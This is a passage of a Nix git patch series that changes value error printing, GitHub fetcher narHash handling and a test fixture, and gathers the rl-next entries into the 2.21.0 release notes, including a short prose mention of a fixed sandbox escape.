+     *
+     * This will cause expressions like `builtins.throw "uh oh!"` to throw
+     * errors, but will print attribute sets and other nested structures
+     * containing values that error (like `nixpkgs`) normally.
+     */
+    ThrowTopLevel,
+};
+
 /**
  * Options for printing Nix values.
  */
@@ -68,6 +91,11 @@ struct PrintOptions
      */
     size_t prettyIndent = 0;
 
+    /**
+     * How to handle errors encountered while printing values.
+     */
+    ErrorPrintBehavior errors = ErrorPrintBehavior::Print;
+
     /**
      * True if pretty-printing is enabled.
      */
@@ -86,7 +114,7 @@ static PrintOptions errorPrintOptions = PrintOptions {
     .maxDepth = 10,
     .maxAttrs = 10,
     .maxListItems = 10,
-    .maxStringLength = 1024
+    .maxStringLength = 1024,
 };
 
 }
diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc
index 9d280f623..f67e94750 100644
--- a/src/libexpr/print.cc
+++ b/src/libexpr/print.cc
@@ -271,25 +271,21 @@ private:
 
     void printDerivation(Value & v)
     {
-        try {
-            Bindings::iterator i = v.attrs->find(state.sDrvPath);
-            NixStringContext context;
-            std::string storePath;
-            if (i != v.attrs->end())
-                storePath = state.store->printStorePath(state.coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation"));
+        Bindings::iterator i = v.attrs->find(state.sDrvPath);
+        NixStringContext context;
+        std::string storePath;
+        if (i != v.attrs->end())
+            storePath = state.store->printStorePath(state.coerceToStorePath(i->pos, *i->value, context, "while evaluating the drvPath of a derivation"));
 
-            if (options.ansiColors)
-                output << ANSI_GREEN;
-            output << "«derivation";
-            if (!storePath.empty()) {
-                output << " " << storePath;
-            }
-            output << "»";
-            if (options.ansiColors)
-                output << ANSI_NORMAL;
-        } catch (Error & e) {
-            printError_(e);
+        if (options.ansiColors)
+            output << ANSI_GREEN;
+        output << "«derivation";
+        if (!storePath.empty()) {
+            output << " " << storePath;
         }
+        output << "»";
+        if (options.ansiColors)
+            output << ANSI_NORMAL;
     }
 
     bool shouldPrettyPrintAttrs(AttrVec & v)
@@ -510,64 +506,68 @@ private:
         output.flush();
         checkInterrupt();
 
-        if (options.force) {
-            try {
+        try {
+            if (options.force) {
                 state.forceValue(v, v.determinePos(noPos));
-            } catch (Error & e) {
-                printError_(e);
-                return;
             }
-        }
 
-        switch (v.type()) {
+            switch (v.type()) {
 
-        case nInt:
-            printInt(v);
-            break;
+            case nInt:
+                printInt(v);
+                break;
 
-        case nFloat:
-            printFloat(v);
-            break;
+            case nFloat:
+                printFloat(v);
+                break;
 
-        case nBool:
-            printBool(v);
-            break;
+            case nBool:
+                printBool(v);
+                break;
 
-        case nString:
-            printString(v);
-            break;
+            case nString:
+                printString(v);
+                break;
 
-        case nPath:
-            printPath(v);
-            break;
+            case nPath:
+                printPath(v);
+                break;
 
-        case nNull:
-            printNull();
-            break;
+            case nNull:
+                printNull();
+                break;
 
-        case nAttrs:
-            printAttrs(v, depth);
-            break;
+            case nAttrs:
+                printAttrs(v, depth);
+                break;
 
-        case nList:
-            printList(v, depth);
-            break;
+            case nList:
+                printList(v, depth);
+                break;
 
-        case nFunction:
-            printFunction(v);
-            break;
+            case nFunction:
+                printFunction(v);
+                break;
 
-        case nThunk:
-            printThunk(v);
-            break;
+            case nThunk:
+                printThunk(v);
+                break;
 
-        case nExternal:
-            printExternal(v);
-            break;
+            case nExternal:
+                printExternal(v);
+                break;
 
-        default:
-            printUnknown();
-            break;
+            default:
+                printUnknown();
+                break;
+            }
+        } catch (Error & e) {
+            if (options.errors == ErrorPrintBehavior::Throw
+                || (options.errors == ErrorPrintBehavior::ThrowTopLevel
+                    && depth == 0)) {
+                throw;
+            }
+            printError_(e);
         }
     }
 

From c1811c1eba8f6ebfecfd15ff2ec622911b7aeae9 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Sun, 10 Mar 2024 13:38:38 +0100
Subject: [PATCH 609/654] Fix GitHub test

Cherry-picked from 03618bb85f609a9b2f3cd6b82628a95b425e3b72.
---
 tests/nixos/github-flakes.nix | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/tests/nixos/github-flakes.nix b/tests/nixos/github-flakes.nix
index a51689445..6f8a5b9d8 100644
--- a/tests/nixos/github-flakes.nix
+++ b/tests/nixos/github-flakes.nix
@@ -58,7 +58,7 @@ let
       mkdir -p $out/{commits,tarball}
 
       # Setup https://docs.github.com/en/rest/commits/commits#get-a-commit
-      echo '{"sha": "${private-flake-rev}"}' > $out/commits/HEAD
+      echo '{"sha": "${private-flake-rev}", "commit": {"tree": {"sha": "ffffffffffffffffffffffffffffffffffffffff"}}}' > $out/commits/HEAD
 
       # Setup tarball download via API
       dir=private-flake
@@ -72,7 +72,7 @@ let
       mkdir -p $out/commits
 
       # Setup https://docs.github.com/en/rest/commits/commits#get-a-commit
-      echo '{"sha": "${nixpkgs.rev}"}' > $out/commits/HEAD
+      echo '{"sha": "${nixpkgs.rev}", "commit": {"tree": {"sha": "ffffffffffffffffffffffffffffffffffffffff"}}}' > $out/commits/HEAD
     '';
 
   archive = pkgs.runCommand "nixpkgs-flake" {}

From 841fd78baac507b1e97921afa3c2ebaeb6c65bfd Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Sun, 10 Mar 2024 13:56:53 +0100
Subject: [PATCH 610/654] GitArchiveInputScheme: Support the narHash attribute

This is required to produce a locked flakeref.
---
 src/libfetchers/github.cc | 9 ++++++++-
 1 file changed, 8 insertions(+), 1 deletion(-)

diff --git a/src/libfetchers/github.cc b/src/libfetchers/github.cc
index 1ca639419..8100afe4d 100644
--- a/src/libfetchers/github.cc
+++ b/src/libfetchers/github.cc
@@ -98,6 +98,10 @@ struct GitArchiveInputScheme : InputScheme
         if (ref) input.attrs.insert_or_assign("ref", *ref);
         if (host_url) input.attrs.insert_or_assign("host", *host_url);
 
+        auto narHash = url.query.find("narHash");
+        if (narHash != url.query.end())
+            input.attrs.insert_or_assign("narHash", narHash->second);
+
         return input;
     }
 
@@ -135,10 +139,13 @@ struct GitArchiveInputScheme : InputScheme
         assert(!(ref && rev));
         if (ref) path += "/" + *ref;
         if (rev) path += "/" + rev->to_string(HashFormat::Base16, false);
-        return ParsedURL {
+        auto url = ParsedURL {
             .scheme = std::string { schemeName() },
             .path = path,
         };
+        if (auto narHash = input.getNarHash())
+            url.query.insert_or_assign("narHash", narHash->to_string(HashFormat::SRI, true));
+        return url;
     }
 
     Input applyOverrides(

From db9bab2708d8a44067156da686dbaf7604f4bc47 Mon Sep 17 00:00:00 2001
From: Rebecca Turner 
Date: Sun, 10 Mar 2024 12:56:07 -0700
Subject: [PATCH 611/654] `Matcher`: Add virtual destructor

---
 src/nix/profile.cc | 1 +
 1 file changed, 1 insertion(+)

diff --git a/src/nix/profile.cc b/src/nix/profile.cc
index c0f805794..a5a40e4f6 100644
--- a/src/nix/profile.cc
+++ b/src/nix/profile.cc
@@ -481,6 +481,7 @@ struct CmdProfileInstall : InstallablesCommand, MixDefaultProfile
 
 struct Matcher
 {
+    virtual ~Matcher() { }
     virtual std::string getTitle() = 0;
     virtual bool matches(const std::string & name, const ProfileElement & element) = 0;
 };

From 74008d82159b281a9d095a73a39189b8648068e9 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Th=C3=A9ophane=20Hufschmitt?=
 
Date: Mon, 11 Mar 2024 15:34:23 +0100
Subject: [PATCH 612/654] Run preInstallCheck even when not building

Add `runHook preInstallCheck` to the overriden `installCheckPhase` used
for the non-build case.

In particular, this allow the fix from 2a3451077677787eae176c72717817ba80738a5e
to also apply there.
---
 package.nix | 1 +
 1 file changed, 1 insertion(+)

diff --git a/package.nix b/package.nix
index fa898e906..7d9a39771 100644
--- a/package.nix
+++ b/package.nix
@@ -343,6 +343,7 @@ in {
 
   # Work around weird bug where it doesn't think there is a Makefile.
   installCheckPhase = if (!doBuild && doInstallCheck) then ''
+    runHook preInstallCheck
     mkdir -p src/nix-channel
     make installcheck -j$NIX_BUILD_CORES -l$NIX_BUILD_CORES
   '' else null;

From b12dc76cfc9d6de0cdb1e34d43f1373a3b305772 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 11 Mar 2024 16:22:29 +0100
Subject: [PATCH 613/654] release notes: 2.21.0

---
 doc/manual/rl-next/arg-from-file.md           |   9 -
 .../rl-next/better-errors-in-nix-repl.md      |  40 --
 .../debugger-locals-for-let-expressions.md    |   9 -
 doc/manual/rl-next/debugger-on-trace.md       |   9 -
 doc/manual/rl-next/debugger-positions.md      |  25 --
 ...debugger-more-reliably-in-let-and-calls.md |  25 --
 doc/manual/rl-next/fod-sandbox-escape.md      |  14 -
 doc/manual/rl-next/forbid-nested-debuggers.md |  32 --
 doc/manual/rl-next/formal-order.md            |   7 -
 doc/manual/rl-next/inherit-error-positions.md |   6 -
 doc/manual/rl-next/inherit-from-by-need.md    |   7 -
 doc/manual/rl-next/lambda-printing.md         |  50 ---
 doc/manual/rl-next/leading-period.md          |  10 -
 .../rl-next/more-commands-respect-ctrl-c.md   |  13 -
 .../rl-next/pretty-print-in-nix-repl.md       |  24 --
 doc/manual/rl-next/profile-regex-all.md       |  35 --
 doc/manual/rl-next/reduce-debugger-clutter.md |  37 --
 .../rl-next/repl-ctrl-c-while-printing.md     |   8 -
 doc/manual/rl-next/repl-cycle-detection.md    |  22 --
 ...-location-in-while-evaluating-attribute.md |  23 --
 doc/manual/rl-next/stack-size-macos.md        |   9 -
 doc/manual/src/SUMMARY.md.in                  |   1 +
 doc/manual/src/release-notes/rl-2.21.md       | 366 ++++++++++++++++++
 23 files changed, 367 insertions(+), 414 deletions(-)
 delete mode 100644 doc/manual/rl-next/arg-from-file.md
 delete mode 100644 doc/manual/rl-next/better-errors-in-nix-repl.md
 delete mode 100644 doc/manual/rl-next/debugger-locals-for-let-expressions.md
 delete mode 100644 doc/manual/rl-next/debugger-on-trace.md
 delete mode 100644 doc/manual/rl-next/debugger-positions.md
 delete mode 100644 doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md
 delete mode 100644 doc/manual/rl-next/fod-sandbox-escape.md
 delete mode 100644 doc/manual/rl-next/forbid-nested-debuggers.md
 delete mode 100644 doc/manual/rl-next/formal-order.md
 delete mode 100644 doc/manual/rl-next/inherit-error-positions.md
 delete mode 100644 doc/manual/rl-next/inherit-from-by-need.md
 delete mode 100644 doc/manual/rl-next/lambda-printing.md
 delete mode 100644 doc/manual/rl-next/leading-period.md
 delete mode 100644 doc/manual/rl-next/more-commands-respect-ctrl-c.md
 delete mode 100644 doc/manual/rl-next/pretty-print-in-nix-repl.md
 delete mode 100644 doc/manual/rl-next/profile-regex-all.md
 delete mode 100644 doc/manual/rl-next/reduce-debugger-clutter.md
 delete mode 100644 doc/manual/rl-next/repl-ctrl-c-while-printing.md
 delete mode 100644 doc/manual/rl-next/repl-cycle-detection.md
 delete mode 100644 doc/manual/rl-next/source-location-in-while-evaluating-attribute.md
 delete mode 100644 doc/manual/rl-next/stack-size-macos.md
 create mode 100644 doc/manual/src/release-notes/rl-2.21.md

diff --git a/doc/manual/rl-next/arg-from-file.md b/doc/manual/rl-next/arg-from-file.md
deleted file mode 100644
index 5849b11a3..000000000
--- a/doc/manual/rl-next/arg-from-file.md
+++ /dev/null
@@ -1,9 +0,0 @@
----
-synopsis: "CLI options `--arg-from-file` and `--arg-from-stdin`"
-prs: 10122
----
-
-The new CLI option `--arg-from-file` *name* *path* passes the contents
-of file *path* as a string value via the function argument *name* to a
-Nix expression. Similarly, the new option `--arg-from-stdin` *name*
-reads the contents of the string from standard input.
diff --git a/doc/manual/rl-next/better-errors-in-nix-repl.md b/doc/manual/rl-next/better-errors-in-nix-repl.md
deleted file mode 100644
index 4deaa8c70..000000000
--- a/doc/manual/rl-next/better-errors-in-nix-repl.md
+++ /dev/null
@@ -1,40 +0,0 @@
----
-synopsis: Concise error printing in `nix repl`
-prs: 9928
----
-
-Previously, if an element of a list or attribute set threw an error while
-evaluating, `nix repl` would print the entire error (including source location
-information) inline. This output was clumsy and difficult to parse:
-
-```
-nix-repl> { err = builtins.throw "uh oh!"; }
-{ err = «error:
-       … while calling the 'throw' builtin
-         at «string»:1:9:
-            1| { err = builtins.throw "uh oh!"; }
-             |         ^
-
-       error: uh oh!»; }
-```
-
-Now, only the error message is displayed, making the output much more readable.
-```
-nix-repl> { err = builtins.throw "uh oh!"; }
-{ err = «error: uh oh!»; }
-```
-
-However, if the whole expression being evaluated throws an error, source
-locations and (if applicable) a stack trace are printed, just like you'd expect:
-
-```
-nix-repl> builtins.throw "uh oh!"
-error:
-       … while calling the 'throw' builtin
-         at «string»:1:1:
-            1| builtins.throw "uh oh!"
-             | ^
-
-       error: uh oh!
-```
-
diff --git a/doc/manual/rl-next/debugger-locals-for-let-expressions.md b/doc/manual/rl-next/debugger-locals-for-let-expressions.md
deleted file mode 100644
index 736208724..000000000
--- a/doc/manual/rl-next/debugger-locals-for-let-expressions.md
+++ /dev/null
@@ -1,9 +0,0 @@
----
-synopsis: "`--debugger` can now access bindings from `let` expressions"
-prs: 9918
-issues: 8827.
----
-
-Breakpoints and errors in the bindings of a `let` expression can now access
-those bindings in the debugger. Previously, only the body of `let` expressions
-could access those bindings.
diff --git a/doc/manual/rl-next/debugger-on-trace.md b/doc/manual/rl-next/debugger-on-trace.md
deleted file mode 100644
index 721928550..000000000
--- a/doc/manual/rl-next/debugger-on-trace.md
+++ /dev/null
@@ -1,9 +0,0 @@
----
-synopsis: Enter the `--debugger` when `builtins.trace` is called if `debugger-on-trace` is set
-prs: 9914
----
-
-If the `debugger-on-trace` option is set and `--debugger` is given,
-`builtins.trace` calls will behave similarly to `builtins.break` and will enter
-the debug REPL. This is useful for determining where warnings are being emitted
-from.
diff --git a/doc/manual/rl-next/debugger-positions.md b/doc/manual/rl-next/debugger-positions.md
deleted file mode 100644
index 2fe868413..000000000
--- a/doc/manual/rl-next/debugger-positions.md
+++ /dev/null
@@ -1,25 +0,0 @@
----
-synopsis: Debugger prints source position information
-prs: 9913
----
-
-The `--debugger` now prints source location information, instead of the
-pointers of source location information. Before:
-
-```
-nix-repl> :bt
-0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
-0x600001522598
-```
-
-After:
-
-```
-0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
-/nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
-
-   131|
-   132|       bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
-      |                           ^
-   133|     in
-```
diff --git a/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md b/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md
deleted file mode 100644
index c93225816..000000000
--- a/doc/manual/rl-next/enter-debugger-more-reliably-in-let-and-calls.md
+++ /dev/null
@@ -1,25 +0,0 @@
----
-synopsis: The `--debugger` will start more reliably in `let` expressions and function calls
-prs: 9917
-issues: 6649
----
-
-Previously, if you attempted to evaluate this file with the debugger:
-
-```nix
-let
-  a = builtins.trace "before inner break" (
-    builtins.break "hello"
-  );
-  b = builtins.trace "before outer break" (
-    builtins.break a
-  );
-in
-  b
-```
-
-Nix would correctly enter the debugger at `builtins.break a`, but if you asked
-it to `:continue`, it would skip over the `builtins.break "hello"` expression
-entirely.
-
-Now, Nix will correctly enter the debugger at both breakpoints.
diff --git a/doc/manual/rl-next/fod-sandbox-escape.md b/doc/manual/rl-next/fod-sandbox-escape.md
deleted file mode 100644
index ed451711e..000000000
--- a/doc/manual/rl-next/fod-sandbox-escape.md
+++ /dev/null
@@ -1,14 +0,0 @@
----
-synopsis: Fix a FOD sandbox escape
-issues:
-prs:
----
-
-Cooperating Nix derivations could send file descriptors to files in the Nix
-store to each other via Unix domain sockets in the abstract namespace. This
-allowed one derivation to modify the output of the other derivation, after Nix
-has registered the path as "valid" and immutable in the Nix database.
-In particular, this allowed the output of fixed-output derivations to be
-modified from their expected content.
-
-This isn't the case any more.
diff --git a/doc/manual/rl-next/forbid-nested-debuggers.md b/doc/manual/rl-next/forbid-nested-debuggers.md
deleted file mode 100644
index a5924b24f..000000000
--- a/doc/manual/rl-next/forbid-nested-debuggers.md
+++ /dev/null
@@ -1,32 +0,0 @@
----
-synopsis: Nested debuggers are no longer supported
-prs: 9920
----
-
-Previously, evaluating an expression that throws an error in the debugger would
-enter a second, nested debugger:
-
-```
-nix-repl> builtins.throw "what"
-error: what
-
-
-Starting REPL to allow you to inspect the current state of the evaluator.
-
-Welcome to Nix 2.18.1. Type :? for help.
-
-nix-repl>
-```
-
-Now, it just prints the error message like `nix repl`:
-
-```
-nix-repl> builtins.throw "what"
-error:
-       … while calling the 'throw' builtin
-         at «string»:1:1:
-            1| builtins.throw "what"
-             | ^
-
-       error: what
-```
diff --git a/doc/manual/rl-next/formal-order.md b/doc/manual/rl-next/formal-order.md
deleted file mode 100644
index 12628e318..000000000
--- a/doc/manual/rl-next/formal-order.md
+++ /dev/null
@@ -1,7 +0,0 @@
----
-synopsis: consistent order of lambda formals in printed expressions
-prs: 9874
----
-
-Always print lambda formals in lexicographic order rather than the internal, creation-time based symbol order.
-This makes printed formals independent of the context they appear in.
diff --git a/doc/manual/rl-next/inherit-error-positions.md b/doc/manual/rl-next/inherit-error-positions.md
deleted file mode 100644
index 643080e9e..000000000
--- a/doc/manual/rl-next/inherit-error-positions.md
+++ /dev/null
@@ -1,6 +0,0 @@
----
-synopsis: fix duplicate attribute error positions for `inherit`
-prs: 9874
----
-
-When an inherit caused a duplicate attribute error the position of the error was not reported correctly, placing the error with the inherit itself or at the start of the bindings block instead of the offending attribute name.
diff --git a/doc/manual/rl-next/inherit-from-by-need.md b/doc/manual/rl-next/inherit-from-by-need.md
deleted file mode 100644
index 67c2cdedf..000000000
--- a/doc/manual/rl-next/inherit-from-by-need.md
+++ /dev/null
@@ -1,7 +0,0 @@
----
-synopsis: "`inherit (x) ...` evaluates `x` only once"
-prs: 9847
----
-
-`inherit (x) a b ...` now evaluates the expression `x` only once for all inherited attributes rather than once for each inherited attribute.
-This does not usually have a measurable impact, but side-effects (such as `builtins.trace`) would be duplicated and expensive expressions (such as derivations) could cause a measurable slowdown.
diff --git a/doc/manual/rl-next/lambda-printing.md b/doc/manual/rl-next/lambda-printing.md
deleted file mode 100644
index 3a63f3068..000000000
--- a/doc/manual/rl-next/lambda-printing.md
+++ /dev/null
@@ -1,50 +0,0 @@
----
-synopsis: Functions are printed with more detail
-prs: 9606
-issues: 7145
----
-
-Functions and `builtins` are printed with more detail in `nix repl`, `nix
-eval`, `builtins.trace`, and most other places values are printed.
-
-Before:
-
-```
-$ nix repl nixpkgs
-nix-repl> builtins.map
-«primop»
-
-nix-repl> builtins.map lib.id
-«primop-app»
-
-nix-repl> builtins.trace lib.id "my-value"
-trace: 
-"my-value"
-
-$ nix eval --file functions.nix
-{ id = ; primop = ; primop-app = ; }
-```
-
-After:
-
-```
-$ nix repl nixpkgs
-nix-repl> builtins.map
-«primop map»
-
-nix-repl> builtins.map lib.id
-«partially applied primop map»
-
-nix-repl> builtins.trace lib.id "my-value"
-trace: «lambda id @ /nix/store/8rrzq23h2zq7sv5l2vhw44kls5w0f654-source/lib/trivial.nix:26:5»
-"my-value"
-
-$ nix eval --file functions.nix
-{ id = «lambda id @ /Users/wiggles/nix/functions.nix:2:8»; primop = «primop map»; primop-app = «partially applied primop map»; }
-```
-
-This was actually released in Nix 2.20, but wasn't added to the release notes
-so we're announcing it here. The historical release notes have been updated as well.
-
-[type-error]: https://github.com/NixOS/nix/pull/9753
-[coercion-error]: https://github.com/NixOS/nix/pull/9754
diff --git a/doc/manual/rl-next/leading-period.md b/doc/manual/rl-next/leading-period.md
deleted file mode 100644
index ef7c2326f..000000000
--- a/doc/manual/rl-next/leading-period.md
+++ /dev/null
@@ -1,10 +0,0 @@
----
-synopsis: Store paths are allowed to start with `.`
-issues: 912
-prs: 9867 9091 9095 9120 9121 9122 9130 9219 9224
----
-
-Leading periods were allowed by accident in Nix 2.4. The Nix team has considered this to be a bug, but this behavior has since been relied on by users, leading to unnecessary difficulties.
-From now on, leading periods are officially, definitively supported. The names `.` and `..` are disallowed, as well as those starting with `.-` or `..-`.
-
-Nix versions that denied leading periods are documented [in the issue](https://github.com/NixOS/nix/issues/912#issuecomment-1919583286).
diff --git a/doc/manual/rl-next/more-commands-respect-ctrl-c.md b/doc/manual/rl-next/more-commands-respect-ctrl-c.md
deleted file mode 100644
index 948930c96..000000000
--- a/doc/manual/rl-next/more-commands-respect-ctrl-c.md
+++ /dev/null
@@ -1,13 +0,0 @@
----
-synopsis: Nix commands respect Ctrl-C
-prs: 9687 6995
-issues: 7245
----
-
-Previously, many Nix commands would hang indefinitely if Ctrl-C was pressed
-while performing various operations (including `nix develop`, `nix flake
-update`, and so on). With several fixes to Nix's signal handlers, Nix commands
-will now exit quickly after Ctrl-C is pressed.
-
-This was actually released in Nix 2.20, but wasn't added to the release notes
-so we're announcing it here. The historical release notes have been updated as well.
diff --git a/doc/manual/rl-next/pretty-print-in-nix-repl.md b/doc/manual/rl-next/pretty-print-in-nix-repl.md
deleted file mode 100644
index 26ba5162a..000000000
--- a/doc/manual/rl-next/pretty-print-in-nix-repl.md
+++ /dev/null
@@ -1,24 +0,0 @@
----
-synopsis: "`nix repl` pretty-prints values"
-prs: 9931
----
-
-`nix repl` will now pretty-print values:
-
-```
-{
-  attrs = {
-    a = {
-      b = {
-        c = { };
-      };
-    };
-  };
-  list = [ 1 ];
-  list' = [
-    1
-    2
-    3
-  ];
-}
-```
diff --git a/doc/manual/rl-next/profile-regex-all.md b/doc/manual/rl-next/profile-regex-all.md
deleted file mode 100644
index e3e6849cc..000000000
--- a/doc/manual/rl-next/profile-regex-all.md
+++ /dev/null
@@ -1,35 +0,0 @@
----
-synopsis: Introduction of `--regex` and `--all` in `nix profile remove` and `nix profile upgrade`
-prs: 10166
----
-
-Previously the command-line arguments for `nix profile remove` and `nix profile upgrade` matched the package entries using regular expression.
-For instance:
-
-```
-nix profile remove '.*vim.*'
-```
-
-This would remove all packages that contain `vim` in their name.
-
-In most cases, only singular package names were used to remove and upgrade packages. Mixing this with regular expressions sometimes lead to unintended behavior. For instance, `python3.1` could match `python311`.
-
-To avoid unintended behavior, the arguments are now only matching exact names.
-
-Matching using regular expressions is still possible by using the new `--regex` flag:
-
-```
-nix profile remove --regex '.*vim.*'
-```
-
-One of the most useful cases for using regular expressions was to upgrade all packages. This was previously accomplished by:
-
-```
-nix profile upgrade '.*'
-```
-
-With the introduction of the `--all` flag, this now becomes more straightforward:
-
-```
-nix profile upgrade --all
-```
diff --git a/doc/manual/rl-next/reduce-debugger-clutter.md b/doc/manual/rl-next/reduce-debugger-clutter.md
deleted file mode 100644
index 9bc902eee..000000000
--- a/doc/manual/rl-next/reduce-debugger-clutter.md
+++ /dev/null
@@ -1,37 +0,0 @@
----
-synopsis: "Visual clutter in `--debugger` is reduced"
-prs: 9919
----
-
-Before:
-```
-info: breakpoint reached
-
-
-Starting REPL to allow you to inspect the current state of the evaluator.
-
-Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
-
-nix-repl> :continue
-error: uh oh
-
-
-Starting REPL to allow you to inspect the current state of the evaluator.
-
-Welcome to Nix 2.20.0pre20231222_dirty. Type :? for help.
-
-nix-repl>
-```
-
-After:
-
-```
-info: breakpoint reached
-
-Nix 2.20.0pre20231222_dirty debugger
-Type :? for help.
-nix-repl> :continue
-error: uh oh
-
-nix-repl>
-```
diff --git a/doc/manual/rl-next/repl-ctrl-c-while-printing.md b/doc/manual/rl-next/repl-ctrl-c-while-printing.md
deleted file mode 100644
index 15b0daa0a..000000000
--- a/doc/manual/rl-next/repl-ctrl-c-while-printing.md
+++ /dev/null
@@ -1,8 +0,0 @@
----
-synopsis: "`nix repl` now respects Ctrl-C while printing values"
-prs: 9927
----
-
-`nix repl` will now halt immediately when Ctrl-C is pressed while it's printing
-a value. This is useful if you got curious about what would happen if you
-printed all of Nixpkgs.
diff --git a/doc/manual/rl-next/repl-cycle-detection.md b/doc/manual/rl-next/repl-cycle-detection.md
deleted file mode 100644
index de24c4be1..000000000
--- a/doc/manual/rl-next/repl-cycle-detection.md
+++ /dev/null
@@ -1,22 +0,0 @@
----
-synopsis: Cycle detection in `nix repl` is simpler and more reliable
-prs: 9926
-issues: 8672
----
-
-The cycle detection in `nix repl`, `nix eval`, `builtins.trace`, and everywhere
-else values are printed is now simpler and matches the cycle detection in
-`nix-instantiate --eval` output.
-
-Before:
-
-```
-nix eval --expr 'let self = { inherit self; }; in self'
-{ self = { self = «repeated»; }; }
-```
-
-After:
-
-```
-{ self = «repeated»; }
-```
diff --git a/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md b/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md
deleted file mode 100644
index 0e0b74c5a..000000000
--- a/doc/manual/rl-next/source-location-in-while-evaluating-attribute.md
+++ /dev/null
@@ -1,23 +0,0 @@
----
-synopsis: "In the debugger, `while evaluating the attribute` errors now include position information"
-prs: 9915
----
-
-Before:
-
-```
-0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
-0x600001522598
-```
-
-After:
-
-```
-0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
-/nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
-
-   131|
-   132|       bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
-      |                           ^
-   133|     in
-```
diff --git a/doc/manual/rl-next/stack-size-macos.md b/doc/manual/rl-next/stack-size-macos.md
deleted file mode 100644
index b1c40bb5a..000000000
--- a/doc/manual/rl-next/stack-size-macos.md
+++ /dev/null
@@ -1,9 +0,0 @@
----
-synopsis: Stack size is increased on macOS
-prs: 9860
----
-
-Previously, Nix would set the stack size to 64MiB on Linux, but would leave the
-stack size set to the default (approximately 8KiB) on macOS. Now, the stack
-size is correctly set to 64MiB on macOS as well, which should reduce stack
-overflow segfaults in deeply-recursive Nix expressions.
diff --git a/doc/manual/src/SUMMARY.md.in b/doc/manual/src/SUMMARY.md.in
index 70dea4fbd..1149fc7b4 100644
--- a/doc/manual/src/SUMMARY.md.in
+++ b/doc/manual/src/SUMMARY.md.in
@@ -121,6 +121,7 @@
   - [C++ style guide](contributing/cxx.md)
 - [Release Notes](release-notes/index.md)
 {{#include ./SUMMARY-rl-next.md}}
+  - [Release 2.21 (2024-03-11)](release-notes/rl-2.21.md)
   - [Release 2.20 (2024-01-29)](release-notes/rl-2.20.md)
   - [Release 2.19 (2023-11-17)](release-notes/rl-2.19.md)
   - [Release 2.18 (2023-09-20)](release-notes/rl-2.18.md)
diff --git a/doc/manual/src/release-notes/rl-2.21.md b/doc/manual/src/release-notes/rl-2.21.md
new file mode 100644
index 000000000..707b56ce1
--- /dev/null
+++ b/doc/manual/src/release-notes/rl-2.21.md
@@ -0,0 +1,366 @@
+# Release 2.21.0 (2024-03-11)
+
+- CLI options `--arg-from-file` and `--arg-from-stdin` [#10122](https://github.com/NixOS/nix/pull/10122)
+
+  The new CLI option `--arg-from-file` *name* *path* passes the contents
+  of file *path* as a string value via the function argument *name* to a
+  Nix expression. Similarly, the new option `--arg-from-stdin` *name*
+  reads the contents of the string from standard input.
+
+- Concise error printing in `nix repl` [#9928](https://github.com/NixOS/nix/pull/9928)
+
+  Previously, if an element of a list or attribute set threw an error while
+  evaluating, `nix repl` would print the entire error (including source location
+  information) inline. This output was clumsy and difficult to parse:
+
+  ```
+  nix-repl> { err = builtins.throw "uh oh!"; }
+  { err = «error:
+         … while calling the 'throw' builtin
+           at «string»:1:9:
+              1| { err = builtins.throw "uh oh!"; }
+               |         ^
+
+         error: uh oh!»; }
+  ```
+
+  Now, only the error message is displayed, making the output much more readable.
+  ```
+  nix-repl> { err = builtins.throw "uh oh!"; }
+  { err = «error: uh oh!»; }
+  ```
+
+  However, if the whole expression being evaluated throws an error, source
+  locations and (if applicable) a stack trace are printed, just like you'd expect:
+
+  ```
+  nix-repl> builtins.throw "uh oh!"
+  error:
+         … while calling the 'throw' builtin
+           at «string»:1:1:
+              1| builtins.throw "uh oh!"
+               | ^
+
+         error: uh oh!
+  ```
+
+- `--debugger` can now access bindings from `let` expressions [#8827](https://github.com/NixOS/nix/issues/8827) [#9918](https://github.com/NixOS/nix/pull/9918)
+
+  Breakpoints and errors in the bindings of a `let` expression can now access
+  those bindings in the debugger. Previously, only the body of `let` expressions
+  could access those bindings.
+
+- Enter the `--debugger` when `builtins.trace` is called if `debugger-on-trace` is set [#9914](https://github.com/NixOS/nix/pull/9914)
+
+  If the `debugger-on-trace` option is set and `--debugger` is given,
+  `builtins.trace` calls will behave similarly to `builtins.break` and will enter
+  the debug REPL. This is useful for determining where warnings are being emitted
+  from.
+
+- Debugger prints source position information [#9913](https://github.com/NixOS/nix/pull/9913)
+
+  The `--debugger` now prints source location information, instead of the
+  pointers of source location information. Before:
+
+  ```
+  nix-repl> :bt
+  0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+  0x600001522598
+  ```
+
+  After:
+
+  ```
+  0: while evaluating the attribute 'python311.pythonForBuild.pkgs'
+  /nix/store/hg65h51xnp74ikahns9hyf3py5mlbbqq-source/overrides/default.nix:132:27
+
+     131|
+     132|       bootstrappingBase = pkgs.${self.python.pythonAttr}.pythonForBuild.pkgs;
+        |                           ^
+     133|     in
+  ```
+
+- The `--debugger` will start more reliably in `let` expressions and function calls [#6649](https://github.com/NixOS/nix/issues/6649) [#9917](https://github.com/NixOS/nix/pull/9917)
+
+  Previously, if you attempted to evaluate this file with the debugger:
+
+  ```nix
+  let
+    a = builtins.trace "before inner break" (
+      builtins.break "hello"
+    );
+    b = builtins.trace "before outer break" (
+      builtins.break a
